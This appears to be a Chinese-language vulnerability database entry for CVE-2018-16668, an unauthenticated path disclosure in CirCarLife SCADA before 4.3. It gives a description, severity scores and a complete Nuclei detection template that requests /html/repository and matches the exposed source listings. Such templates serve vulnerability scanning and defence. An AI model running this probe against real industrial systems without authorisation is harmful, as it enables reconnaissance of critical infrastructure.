CVE-2018-16668: CirCarLife <4.3 - Improper Authentication

日期: 2025-08-01 | 影响软件: CirCarLife | POC: 已公开

漏洞描述

CirCarLife before 4.3 is susceptible to improper authentication. An internal installation path disclosure exists due to the lack of authentication for /html/repository.System. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.

PoC代码[已公开]

id: CVE-2018-16668

info:
  name: CirCarLife <4.3 - Improper Authentication
  author: geeknik
  severity: medium
  description: CirCarLife before 4.3 is susceptible to improper authentication. An internal installation path disclosure exists due to the lack of authentication for /html/repository.System. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data, compromising the confidentiality and integrity of the system.
  remediation: |
    Upgrade CirCarLife to version 4.3 or higher to fix the improper authentication issue.
  reference:
    - https://www.exploit-db.com/exploits/45384
    - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life
    - https://www.exploit-db.com/exploits/45384/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16668
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2018-16668
    cwe-id: CWE-287
    epss-score: 0.46955
    epss-percentile: 0.97611
    cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: circontrol
    product: circarlife_scada
  tags: cve,cve2018,circarlife,scada,iot,disclosure,edb,circontrol

http:
  - method: GET
    path:
      - "{{BaseURL}}/html/repository"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "CirCarLife Scada"

      - type: word
        part: body
        words:
          - "** Platform sources **"
          - "** Application sources **"
        condition: and
# digest: 4a0a00473045022100bd26f760836f2aab619dd0dc683dde61994aa2931c18146b0025c3a0c594d7b9022020ee417c87ca7af30694279d69cf831d923e7104b4f1a8b1e6aea2b5319534cf:922c64590222798bb761d5b6d8e72950

相关漏洞推荐